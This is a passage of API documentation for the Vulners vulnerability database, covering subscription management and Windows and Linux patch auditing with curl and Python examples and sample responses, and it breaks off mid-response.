- apiKey: Activated API key required for authentication.
Query:
GET /api/v3/subscriptions/listWebhookSubscriptions/
Query example:
curl -G "https://vulners.com/api/v3/subscriptions/listWebhookSubscriptions/" \
--data-urlencode "apiKey={API key}"
vulners_api.get_webhooks()
{
"result": "OK",
"data": {
"subscriptions": [
{
"id": "{subscription id}",
"query": "viewCount:[50 TO *] order:viewCount last 8 days",
"active": true,
"webhook": "https://vulners.com/api/v3/subscriptions/webhook?newest_only=true&subscriptionid={subscription id}&apiKey={api key}"
}
]
}
}
Enable/Disable webhook¶
Required parameters:
- subscriptionid (str): The ID of the webhook subscription to enable or disable.
- active (str): Boolean value ("true" or "false") to activate or deactivate the webhook.
- apiKey: Activated API key required for authentication.
Query:
POST /api/v3/subscriptions/enableWebhookSubscription/
Query example:
curl -XPOST https://vulners.com/api/v3/subscriptions/enableWebhookSubscription/ -H 'Content-Type: application/json' -d '{
"subscriptionid": "{subscription id}",
"active": false,
"apiKey": "{API key}"
}'
{
"result": "OK",
"data": {}
}
Read webhook¶
Required parameters:
- newest_only: Boolean value ("true" or "false") to specify if only the newest updates should be retrieved.
- subscriptionid: The ID of the webhook subscription to read.
- apiKey: Activated API key required for authentication.
Query:
GET /api/v3/subscriptions/webhook/
Query example:
curl -G "https://vulners.com/api/v3/subscriptions/webhook/" \
--data-urlencode "subscriptionid={subscription id}" \
--data-urlencode "newest_only=false" \
--data-urlencode "apiKey={API key}"
Search results
Email notifications¶
Email notifications (subscriptions) can be managed via the API as well as via the web interface.
Get subscriptions¶
Required parameters:
- query: Search query using Lucene syntax. Defines the criteria for filtering the notifications.
- email: The email address where notifications will be sent.
- format: The format in which the notification email will be sent (e.g., HTML, JSON).
- crontab: A schedule for the notifications using the Unix-like cron syntax.
- query_type: Specifies the type of query, typically "lucene".
- apiKey: Activated API key required for authentication.
Query:
GET /api/v3/subscriptions/listEmailSubscriptions/
Query example:
curl -X GET 'https://vulners.com/api/v3/subscriptions/listEmailSubscriptions/?apiKey=apikey'
subscriptions = vulners_api.get_subscriptions()
{
"result": "OK",
"data": {
"subscriptions": [
{
"id": "3C5SC5C5IS6DG9HE8BG470LBWBJWU0GTO2OAN93DLUJCSCH3SYWO1S13I8K17DSB",
"active": false,
"confirmed": false,
"query": "viewCount:[50 TO *] order:viewCount last 5 days",
"query_type": "lucene",
"link_query": "/search?query=viewCount%3A%5B50%20TO%20%2A%5D%20order%3AviewCount%20last%205%20days",
"crontab": "0 0 * * *",
"deliveryAddress": "[email protected]",
"deliveryFormat": "html"
}
]
}
}
Add subscription¶
Required parameters:
- query: Search query using Lucene syntax. Defines the criteria for filtering the notifications.
- email: The email address where notifications will be sent.
- format: The format in which the notification email will be sent (e.g., HTML, JSON).
- crontab: A schedule for the notifications using the Unix-like cron syntax.
- query_type: Specifies the type of query, typically "lucene".
- apiKey: Activated API key required for authentication.
Query:
POST /api/v3/subscriptions/addEmailSubscription/
Query example:
curl -X POST 'https://vulners.com/api/v3/subscriptions/addEmailSubscription/' -H 'Content-Type: application/json' -d '{
"query": "viewCount:[50 TO *] order:viewCount last 5 days",
"email": "[email protected]",
"format": "html",
"crontab": "0 0 * * *",
"query_type": "lucene",
"apiKey": "{API key}"
}'
add_subscription = vulners_api.add_subscription("viewCount:[50 TO *] order:viewCount last 9 days",
email="[email protected]")
{
"result": "OK",
"data": {
"id": "{subscription id}",
"active": false,
"confirmed": false,
"query": "viewCount:[50 TO *] order:viewCount last 5 days",
"query_type": "lucene",
"link_query": "/search?query=viewCount%3A%5B50%20TO%20%2A%5D%20order%3AviewCount%20last%205%20days",
"crontab": "0 0 * * *",
"deliveryAddress": "[email protected]",
"deliveryFormat": "html"
}
}
Edit subscription¶
Required parameters:
- subscriptionid: The ID of the subscription to be edited.
- format: The new format for the notifications (e.g., HTML, JSON).
- crontab: The new schedule for the notifications using the Unix-like cron syntax.
- active: Boolean value to activate (true) or deactivate (false) the subscription.
- apiKey: Activated API key required for authentication.
Query:
POST /api/v3/subscriptions/editEmailSubscription/
Query example:
curl -X POST 'https://vulners.com/api/v3/subscriptions/editEmailSubscription/' -H 'Content-Type: application/json' -d '{
"subscriptionid": "{subscription id}",
"format": "json",
"crontab": "0 1 * * *",
"active": "false",
"apiKey": "{API key}"
}'
edit_subscription = vulners_api.edit_subscription(
subscriptionid="subscription_id",
active="false"
)
{
"result": "OK",
"data": {
"id": "3C5SC5C5IS6DG9HE8BG470LBWBJWU0GTO2OAN93DLUJCSCH3SYWO1S13I8K17DSB",
"active": false,
"confirmed": false,
"query": "",
"query_type": "lucene",
"link_query": "/search?query=",
"crontab": "0 1 * * *",
"deliveryAddress": "[email protected]",
"deliveryFormat": "json"
}
}
Delete subscription¶
Required parameters:
- subscriptionid: The ID of the subscription to be deleted.
- apiKey: Activated API key required for authentication.
Query:
POST /api/v3/subscriptions/removeEmailSubscription/
Query example:
curl -X POST 'https://vulners.com/api/v3/subscriptions/removeEmailSubscription/' -H 'Content-Type: application/json' -d '{
"subscriptionid": "{subscription id}",
"apiKey": "{API key}"
}'
delete_subscription = vulners_api.delete_subscription(
subscriptionid="subscription_id",
)
{
"result": "OK",
"data": {}
}
Windows Audit¶
Audit Windows via KB¶
Quick audit of Windows hosts for installed security KBs. The Windows audit requires the OS version plus the list of installed updates (KBs).
Required parameters:
- os: OS version; can be obtained from systeminfo.
- kbList: Installed KBs; can be obtained via systeminfo or via wmic qfe list.
- apiKey: Activated API key
Query:
POST /api/v3/audit/kb/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/kb/ -H 'Content-Type: application/json' -d '{
"os": "Windows Server 2012 R2",
"kbList": ["KB5009586", "KB5009624", "KB5008230", "KB5007247", "KB5005693", "KB5007205", "KB5003646"],
"apiKey": "{API key}"
}'
win_vulners = vulners_api.kb_audit(
os="Windows Server 2016", kb_list=["KB5009586", "KB5009624", "KB5008230", "KB5007247", "KB5005693", "KB5007205", "KB5003646"])
need_2_install_kb = win_vulners['kbMissed']
affected_cve = win_vulners['cvelist']
[
"KB5000803",
"KB5017095",
"KB5011495",
"KB5003638",
"KB5009546",
"KB5012596",
"KB5004948",
"KB5001347",
"KB5007192",
"KB5004238",
"KB5010359",
"KB5014702",
"KB5016622",
"KB4601318",
"KB5005573",
"KB5008207",
"KB5006669",
"KB5012170",
"KB5015808",
"KB5005043",
"KB5013952",
"KB5003197"
]
[ "CVE-2021-36942",
"CVE-2021-31958",
"CVE-2022-34302",
"CVE-2022-30166",
"CVE-2022-22002",
"CVE-2021-1640",
"CVE-2021-24111",
"CVE-2022-26832",
"CVE-2021-33757",
"CVE-2021-41361",
"CVE-2021-36938",
"CVE-2020-1036",
"CVE-2021-42279",
"CVE-2022-34303",
"CVE-2021-28318",
"CVE-2020-1472",
"CVE-2022-21897",
"CVE-2021-38667",
"CVE-2021-31959",
"CVE-2021-34481",
"CVE-2022-30154",
"CVE-2021-34459",
"CVE-2022-23293",
"CVE-2020-17049",
"CVE-2020-26784",
"CVE-2022-22048",
"CVE-2021-33779",
"CVE-2021-43893",
"CVE-2022-26784",
"CVE-2021-26419",
"CVE-2021-34527",
"CVE-2022-35822",
"CVE-2022-34301",
"CVE-2022-30138",
"CVE-2021-264110"
]
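The os and kbList values come from systeminfo output. The following added example (not part of the Vulners SDK or this documentation) parses a constructed English-locale systeminfo excerpt into the request body for POST /api/v3/audit/kb/; the edition-stripping rule in normalize_os_name is an assumption made to match the "Windows Server 2012 R2" form used on this page, and the label names are locale dependent.

```python
"""Build the /api/v3/audit/kb/ request body from `systeminfo` output.
Added example; not part of the Vulners SDK or this documentation."""
import json
import re
from typing import Dict, List

# Constructed sample of English-locale `systeminfo` output, trimmed to the
# lines this parser reads. Labels are locale dependent; on a non-English
# system adjust OS_NAME_LABEL, OS_VERSION_LABEL and HOTFIX_LABEL.
SAMPLE_SYSTEMINFO = (
    "Host Name:                 SRV01\n"
    "OS Name:                   Microsoft Windows Server 2012 R2 Standard\n"
    "OS Version:                6.3.9600 N/A Build 9600\n"
    "OS Manufacturer:           Microsoft Corporation\n"
    "Hotfix(s):                 3 Hotfix(s) Installed.\n"
    "                           [01]: KB5009586\n"
    "                           [02]: KB5009624\n"
    "                           [03]: KB5008230\n"
    "Network Card(s):           1 NIC(s) Installed.\n"
    "                           [01]: Intel(R) 82574L Gigabit Network Connection\n"
)

OS_NAME_LABEL = "OS Name:"
OS_VERSION_LABEL = "OS Version:"
HOTFIX_LABEL = "Hotfix(s):"
KB_RE = re.compile(r"\bKB\d{6,7}\b")

# Assumption: the API's "os" value is the product name without the vendor
# prefix and edition, as in the "Windows Server 2012 R2" example on this page.
EDITION_SUFFIXES = ("Standard", "Datacenter", "Enterprise", "Pro", "Home", "Education")


def normalize_os_name(raw: str) -> str:
    """'Microsoft Windows Server 2012 R2 Standard' -> 'Windows Server 2012 R2'."""
    name = raw.strip()
    if name.startswith("Microsoft "):
        name = name[len("Microsoft "):]
    for suffix in EDITION_SUFFIXES:
        if name.endswith(" " + suffix):
            name = name[: -len(suffix) - 1]
            break
    return name


def parse_systeminfo(text: str) -> Dict[str, object]:
    """Extract the OS name, OS version string and the installed KB list.
    KBs are taken only from the Hotfix(s) block, which ends at the next
    top-level label (a line that does not start with whitespace)."""
    os_name, os_version = "", ""
    kbs: List[str] = []
    in_hotfix_block = False
    for line in text.splitlines():
        if line.startswith(OS_NAME_LABEL):
            os_name = normalize_os_name(line[len(OS_NAME_LABEL):])
        elif line.startswith(OS_VERSION_LABEL):
            os_version = line[len(OS_VERSION_LABEL):].strip()
        elif line.startswith(HOTFIX_LABEL):
            in_hotfix_block = True
        elif in_hotfix_block:
            if not line[:1].isspace():
                in_hotfix_block = False  # next top-level label ends the block
                continue
            match = KB_RE.search(line)
            if match and match.group(0) not in kbs:
                kbs.append(match.group(0))  # de-duplicate, keep order
    return {"os": os_name, "os_version": os_version, "kbList": kbs}


def build_kb_audit_payload(systeminfo_text: str, api_key: str) -> Dict[str, object]:
    """Return the JSON body for POST /api/v3/audit/kb/ as in the curl example."""
    info = parse_systeminfo(systeminfo_text)
    if not info["os"] or not info["kbList"]:
        raise ValueError("could not find OS Name or any KB in systeminfo output")
    return {"os": info["os"], "kbList": info["kbList"], "apiKey": api_key}


if __name__ == "__main__":
    # Usage: systeminfo | python kb_audit_payload.py  (VULNERS_API_KEY set in the environment)
    import os
    import sys
    import urllib.request

    api_key = os.environ.get("VULNERS_API_KEY")
    if not api_key:
        sys.exit("set VULNERS_API_KEY instead of hard-coding the key")
    payload = build_kb_audit_payload(sys.stdin.read(), api_key)
    request = urllib.request.Request(
        "https://vulners.com/api/v3/audit/kb/",
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"},
    )
    with urllib.request.urlopen(request) as response:
        # The SDK call shown above unwraps this into kbMissed / cvelist.
        print(json.dumps(json.load(response), indent=2))
```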
Audit installed KB's and software¶
Quick audit of Windows hosts for installed security KBs and software. The Windows audit requires the OS version, a list of installed updates (KBs) and a list of installed software; CPE parts such as target_sw, sw_edition, and platform can be used to improve accuracy.
Required parameters:
- os (str): Operating system name (can be obtained from systeminfo).
- version (str): Operating system version (can be obtained from systeminfo).
- kbList (list): List of installed updates (KB), which can be gathered via the commands systeminfo or wmic qfe list.
- software (list): List of installed software and version information, with optional CPE parameters for further refinement. Read more. Example:
{ "software": "Mozilla Firefox", "version": "117.0", "sw_edition": "home_premium", "target_sw": "windows", "target_hw": "x64", "update": "sp2", "language": "en" }
- apiKey: Activated API key
Additional CPE attributes for refining search accuracy:
- update (str): Specifies the software update version to refine the search for vulnerabilities related to a specific update level. Examples include service packs (e.g., sp1) for Windows, patch versions, hotfixes, or other minor updates. Official NIST 7695 for update: Values for this attribute SHOULD be vendor-specific alphanumeric strings characterizing the particular update, service pack, or point release of the product. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
- language (str): Defines the language edition of the software, if applicable. Use this to target vulnerabilities in localized versions of the software. Official NIST 7695 for language: Values for this attribute SHALL be valid language tags as defined by [RFC5646], and SHOULD be used to define the language supported in the user interface of the product being described. Although any valid language tag MAY be used, only tags containing language and region codes SHOULD be used.
- sw_edition (str): Indicates the specific edition of the software (e.g., home_premium for Windows, continuous for Acrobat Reader, or server for Linux). Official NIST 7695 for sw_edition: Values for this attribute SHOULD characterize how the product is tailored to a particular market or class of end users. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification. Any character string meeting the requirements for WFNs (cf. 5.3.2) MAY be specified as the value of the attribute.
- target_sw (str): Specifies the platform where the software runs, such as windows, macOS, linux, or other environments like java, chrome, azure, etc. If not specified, the search will include software that runs on * or windows platforms. Official NIST 7695 for target_sw: Values for this attribute SHOULD characterize the software computing environment within which the product operates. Values for this attribute SHOULD be selected from an attribute-specific valid-values list, which MAY be defined by other specifications that utilize this specification.
- target_hw (str): Identifies the hardware platform for the software, such as x86, x64, arm, or specific devices like router or mobile. Official NIST 7695 for target_hw: Values for this attribute SHOULD characterize the instruction set architecture (e.g., x86) on which the product being described or identified by the WFN operates. Bytecode-intermediate languages, such as Java bytecode for the Java Virtual Machine or Microsoft Common Intermediate Language for the Common Language Runtime virtual machine, SHALL be considered instruction set architectures.
Optional Parameters:
- platform (str): If provided, this parameter sets the target_hw field for all software to the specified platform value. For example, if "platform": "arm64", all listed software will include target_hw: arm64.
Possible values for CPE parameters:
- *: Includes all values, both those containing - or * and those without.
- "-": Filters results to exclude the specified values.
- "software_name": Includes results with this value and any values containing *.
Defaults:
- platform: arm64 if not explicitly specified.
- target_sw: windows if not explicitly specified.
Query:
POST /api/v3/audit/winaudit/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/winaudit/ -H 'Content-Type: application/json' -d '{
"os": "windows",
"os_version": "10.0.19045",
"kb_list": ["KB5009586", "KB5009624", "KB5008230", "KB5007247", "KB5005693", "KB5007205", "KB5003646"],
"software": [
{"software": "7-Zip", "version": "19.00", "sw_edition": "home_premium", "target_sw": "windows", "target_hw": "x64", "update": "sp1", "language": "en"},
{"software": "Git", "version": "2.33.0.2", "target_sw": "windows", "target_hw": "x64"},
{"software": "Notepad++", "version": "8.4.6", "target_sw": "windows", "target_hw": "x64"},
{"software": "Microsoft OneDrive", "version": "22.227.1030.0001", "sw_edition": "home_premium", "target_sw": "windows", "target_hw": "x64"},
{"software": "VMware Fusion", "version": "13.1", "target_sw": "windows", "target_hw": "x64"}
],
"apiKey": "{API key}"
}'
kb = ["KB5009586", "KB5009624", "KB5008230", "KB5007247", "KB5005693", "KB5007205", "KB5003646"]
software = [{'software': '7-Zip', 'version': '19.00', 'sw_edition': 'home_premium', 'target_sw': 'windows', 'target_hw': 'x64', 'update': 'sp1', 'language': 'en'},
{'software': 'Git', 'version': '2.33.0.2', 'target_sw': 'windows', 'target_hw': 'x64'},
{'software': 'Notepad++', 'version': '8.4.6', 'target_sw': 'windows', 'target_hw': 'x64'},
{'software': 'Microsoft OneDrive', 'version': '22.227.1030.0001', 'sw_edition': 'home_premium', 'target_sw': 'windows', 'target_hw': 'x64'},
{'software': 'VMware Fusion', 'version': '13.1', 'target_sw': 'windows', 'target_hw': 'x64'}
]
os_name = 'windows'
os_version = '10.0.19045'
report = vulners_api.winaudit(os=os_name, os_version=os_version, kb_list=kb, software=software)
Response fields:
- package: The name of the software package.
- published: The date when the bulletin was published.
- bulletinID: The ID of the bulletin associated with the CVEs.
- cvelist: List of CVE IDs linked to the package.
- cvss: CVSS score and severity level of the vulnerabilities.
- fix: Suggested update or patch to fix the issue.
[
{
"package": "windows 11 version 22h2",
"published": "2024-09-10",
"bulletinID": "MS:CVE-2024-38254",
"cvelist": ["CVE-2024-38254"],
"cvss": {
"score": 6.2,
"severity": "MEDIUM"
},
"fix": "Install KB5043076 update"
},
{
"package": "windows 11 version 23h2",
"published": "2024-09-10",
"bulletinID": "MS:CVE-2024-38257",
"cvelist": ["CVE-2024-38257"],
"cvss": {
"score": 7.5,
"severity": "HIGH"
},
"fix": "Install KB5043076 update"
},
{
"package": "windows 11 version 23h2",
"published": "2024-07-09",
"bulletinID": "MS:CVE-2024-38517",
"cvelist": ["CVE-2024-38517"],
"cvss": {
"score": 7.8,
"severity": "HIGH"
},
"fix": "Install KB5040442 update"
}
]
Windows KB superseeding/parentseeding data¶
Refer to this if you need more information about a KB after the previous method. Supersedence information is returned as a dictionary with two fields: 'superseeds' and 'parentseeds'.
- superseeds means "which KBs are covered by this KB".
- parentseeds means "which KBs cover this KB".
Query:
POST /api/v3/search/id/
Query example:
curl -XPOST https://vulners.com/api/v3/search/id/ -H 'Content-Type: application/json' -d '{
"id": "KB4524135",
"fields": ["superseeds", "parentseeds"],
"apiKey": "{API key}"
}'
seeds = vulners_api.get_kb_seeds("KB4524135")
{
"superseeds": [
"KB3021952",
"KB4103768",
"KB2699988",
"KB3100773",
"KB931768",
"KB4466536",
"KB4343205",
"KB896688",
"KB4462949",
"KB2977629",
"KB2817183",
"KB972260",
"KB4457426",
"KB980182",
"KB929969",
"KB4470199",
"KB2544521",
"KB4511872",
"KB2744842",
"KB2879017",
"KB2497640",
"KB2360131",
"KB4025252",
"KB2829530",
"KB4047206",
"KB3093983",
"KB4507434",
"KB4056568",
"KB960714",
"KB2530548",
"KB3203621",
"KB833989",
"KB2761451",
"KB3139929",
"KB4339093",
"KB4483187",
"KB969897",
"KB910620",
"KB942615",
"KB956390",
"KB937143",
"KB4052978",
"KB2416400",
"KB4018271",
"KB2987107",
"KB2870699",
"KB982381",
"KB2183461",
"KB2586448",
"KB958215",
"KB963027",
"KB2862772",
"KB4012204",
"KB4036586",
"KB3175443",
"KB933566",
"KB947864",
"KB2647516",
"KB4486474",
"KB944533",
"KB2976627",
"KB4074736",
"KB2792100",
"KB905915",
"KB922760",
"KB4489873",
"KB883939",
"KB2797052",
"KB2909212",
"KB4230450",
"KB3003057",
"KB4092946",
"KB2963952",
"KB978207",
"KB4034733",
"KB939653",
"KB976325",
"KB3154070",
"KB4040685",
"KB3038314",
"KB928090",
"KB2675157",
"KB4493435",
"KB3197655",
"KB896727",
"KB3034196",
"KB3049563",
"KB3032359",
"KB2618444",
"KB974455",
"KB938127",
"KB2838727",
"KB3148198",
"KB3191492",
"KB3170106",
"KB2559049",
"KB2809289",
"KB3058515",
"KB4014661",
"KB4516046",
"KB950759",
"KB925486",
"KB3036197",
"KB3124275",
"KB2799329",
"KB3008923",
"KB3078071",
"KB953838",
"KB3065822",
"KB2722913",
"KB4021558",
"KB3104002",
"KB912812",
"KB918899",
"KB2482017",
"KB3160005",
"KB2962872",
"KB4096040",
"KB916281",
"KB3185319",
"KB3087038",
"KB4480965",
"KB2761465",
"KB4089187",
"KB2846071",
"KB890923",
"KB4503259",
"KB4498206",
"KB3134814"
],
"parentseeds": [
"KB4571687",
"KB4534251",
"KB4540671",
"KB4586768",
"KB4519974",
"KB4525106",
"KB4530677",
"KB4556798",
"KB4565479",
"KB4561603",
"KB4537767",
"KB4550905",
"KB4577010"
]
}
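A KB reported in kbMissed by the audit may already be covered by a newer cumulative update that is installed; the superseeds/parentseeds data above lets you check that before raising a finding. The following added example (not part of the Vulners SDK or this documentation) builds a parent index from both fields and prunes a kbMissed list; the KB numbers in its sample are constructed placeholders, and in live use the seeds dictionary would be filled with one vulners_api.get_kb_seeds() call per KB.

```python
"""Prune an audit's kbMissed list using KB supersedence data.
Added example; not part of the Vulners SDK or this documentation."""
from collections import defaultdict
from typing import Dict, Iterable, List, Optional, Set, Tuple

# Constructed sample, shaped like the per-KB dictionary returned by
# vulners_api.get_kb_seeds(): 'superseeds' = KBs this KB covers,
# 'parentseeds' = KBs that cover this KB. KB numbers are placeholders.
SAMPLE_SEEDS: Dict[str, Dict[str, List[str]]] = {
    "KB1000001": {"superseeds": ["KB1000000"], "parentseeds": ["KB1000002", "KB1000003"]},
    "KB1000002": {"superseeds": ["KB1000001"], "parentseeds": ["KB1000003"]},
    "KB1000003": {"superseeds": ["KB1000002", "KB1000001"], "parentseeds": []},
    "KB2000000": {"superseeds": [], "parentseeds": []},  # standalone, nothing covers it
}


def build_parent_index(seeds: Dict[str, Dict[str, List[str]]]) -> Dict[str, Set[str]]:
    """Map each KB to the set of KBs that cover it, merging both directions:
    a KB's own 'parentseeds' and every KB whose 'superseeds' lists it. Using
    both sides fills gaps when only some KBs have been looked up (KB1000000
    here has no entry of its own but appears in KB1000001's superseeds)."""
    parents: Dict[str, Set[str]] = defaultdict(set)
    for kb, data in seeds.items():
        parents[kb].update(data.get("parentseeds", []))
        for child in data.get("superseeds", []):
            parents[child].add(kb)
    return dict(parents)


def superseding_installed(kb: str, installed: Set[str],
                          parents: Dict[str, Set[str]]) -> Optional[str]:
    """Breadth-first walk up the supersedence chain; return the first installed
    KB that covers `kb` (directly or transitively), or None."""
    seen = {kb}
    queue = [kb]
    while queue:
        current = queue.pop(0)
        for parent in sorted(parents.get(current, ())):
            if parent in installed:
                return parent
            if parent not in seen:
                seen.add(parent)
                queue.append(parent)
    return None


def prune_missing(kb_missed: Iterable[str], installed: Iterable[str],
                  seeds: Dict[str, Dict[str, List[str]]]) -> Tuple[List[str], Dict[str, str]]:
    """Split kbMissed into (still_missing, covered), where covered maps each
    superseded KB to the installed KB that covers it."""
    installed_set = set(installed)
    parents = build_parent_index(seeds)
    still_missing: List[str] = []
    covered: Dict[str, str] = {}
    for kb in kb_missed:
        if kb in installed_set:
            continue  # already present; nothing to do
        by = superseding_installed(kb, installed_set, parents)
        if by is None:
            still_missing.append(kb)
        else:
            covered[kb] = by
    return still_missing, covered


if __name__ == "__main__":
    # Live use: kb_missed = win_vulners['kbMissed'] from the audit above and
    # seeds = {kb: vulners_api.get_kb_seeds(kb) for kb in kb_missed}.
    missing, covered = prune_missing(
        kb_missed=["KB1000001", "KB1000000", "KB2000000"],
        installed=["KB1000003"],
        seeds=SAMPLE_SEEDS,
    )
    print("still missing:", missing)
    for kb, by in sorted(covered.items()):
        print(f"{kb} is superseded by installed {by}")
```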
Get the list of Windows KB updates with download urls¶
Query:
POST /api/v3/search/lucene/
Query example:
curl -XPOST https://vulners.com/api/v3/search/lucene/ -H 'Content-Type: application/json' -d '{
"query": "type:msupdate AND kb:(KB4524135)",
"skip": 0,
"size": 100,
"fields": [
"id",
"title",
"description",
"type",
"bulletinFamily",
"cvss",
"published",
"modified",
"lastseen",
"href",
"sourceHref",
"sourceData",
"cvelist"],
"apiKey": "{API key}"
}'
microsoft_updates_for_kb = vulners_api.get_kb_updates("KB4524135")
updates_download_links = [update.get('href') for update in microsoft_updates_for_kb]
[
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=ef31383a-7932-441a-a626-f0a145cc422a",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=18552c40-7e36-4f15-960a-9717a4912af1",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=375f016c-b4ac-4d71-9dee-8095427a3c86",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=2ca3d95f-1ecb-4850-aeb4-afb63cd6374a",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=72890150-da44-47b2-b1b5-7dce2d5d1a30",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=fba96f27-5955-45e1-82e5-ad350b4627e0",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=9668152f-78a1-44f9-a229-38e86189703a",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=e08d28ef-d685-412c-b0bc-8cc26bf899c3",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=a22dcbac-485a-4834-8556-fee2e437ab9b",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=db62995c-3814-4fd7-a481-dc285f0640e2",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=16216817-6043-4587-a803-9b3a9f3a58cc",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=393d67e1-8827-4c6d-9187-b6320a9a03bc",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=b18abca1-c8ec-4e43-9fa0-cc2b2a518304",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=96c42c78-234b-4ae7-b097-be0eb8ac6f25",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=63cc9ae6-6d02-4936-8b77-b976b440ff25",
"https://www.catalog.update.microsoft.com/ScopedViewInline.aspx?updateid=2661795f-8beb-468f-9c4f-0de83724a90f"
]
Linux Audit¶
Auditing Linux requires getting the versions of the packages installed on a system.
Supported systems¶
To get all currently supported systems:
Query:
GET /api/v3/audit/audit/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/audit/ -H 'Content-Type: application/json' -d '{
"os": "centos",
"version": "7",
"package": ["glibc-common-2.17-157.el7_3.5.x86_64"],
"apiKey": "{API key}"
}'
Audit Linux hosts for vulnerabilities (RPM/DEB)¶
Example for CentOS 7. You can use it for any RPM based OS. Execute the command: rpm -qa --qf '%{NAME}-%{VERSION}-%{RELEASE}.%{ARCH}\n'
Use its output as the package variable input:
Query:
POST /api/v3/audit/audit/
Query example:
curl -XPOST https://vulners.com/api/v3/audit/audit/ -H 'Content-Type: application/json' -d '{
"os": "centos",
"version": "7",
"package": ["glibc-common-2.17-157.el7_3.5.x86_64"],
"apiKey": "{API key}"
}'
centos_vulnerabilities = vulners_api.os_audit(
os='centos', os_version='7', package=['glibc-common-2.17-157.el7_3.5.x86_64'])
vulnerable_packages = centos_vulnerabilities.get('packages')
missed_patches_ids = centos_vulnerabilities.get('vulnerabilities')
cve_list = centos_vulnerabilities.get('cvelist')
how_to_fix = centos_vulnerabilities.get('cumulativeFix')
{
"glibc-common-2.17-157.el7_3.5.x86_64": {
"CESA-2017:1916": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-196.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-196.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2017:1916",
"cvelist": [
"CVE-2015-8776",
"CVE-2015-8777",
"CVE-2015-8779",
"CVE-2015-8778",
"CVE-2014-9761"
],
"cvss": {
"score": 7.5,
"vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2018:3092": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-260.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-260.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2018:3092",
"cvelist": [
"CVE-2018-11237",
"CVE-2018-6485",
"CVE-2018-11236",
"CVE-2017-16997"
],
"cvss": {
"score": 9.3,
"vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2018:0805": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-222.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-222.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2018:0805",
"cvelist": [
"CVE-2014-9402",
"CVE-2017-15670",
"CVE-2015-5180",
"CVE-2017-15804",
"CVE-2017-12132",
"CVE-2018-1000001"
],
"cvss": {
"score": 7.8,
"vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2019:2118": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-292.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-292.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2019:2118",
"cvelist": [
"CVE-2016-10739"
],
"cvss": {
"score": 4.6,
"vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo yum -y update glibc-common"
},
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
"bulletinOSVersion": "7",
"providedVersion": "0:2.17-157.el7_3.5",
"bulletinVersion": "2.17-292.el7",
"providedPackage": "glibc-common-2.17-157.el7_3.5.x86_64",
"bulletinPackage": "glibc-common-2.17-292.el7.x86_64.rpm",
"operator": "lt",
"bulletinID": "CESA-2019:2118",
"cvelist": [
"CVE-2016-10739"
],
"cvss": {
"score": 4.6,
"vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"
},
"fix": "sudo yum -y update glibc-common"
}
],
"CESA-2020:3861": [
{
"package": "glibc-common-2.17-157.el7_3.5.x86_64",
"providedOSName": "centos",
"matchedOSName": "centos",
"bulletinOSName": "CentOS",
"providedOSVersion": "7",
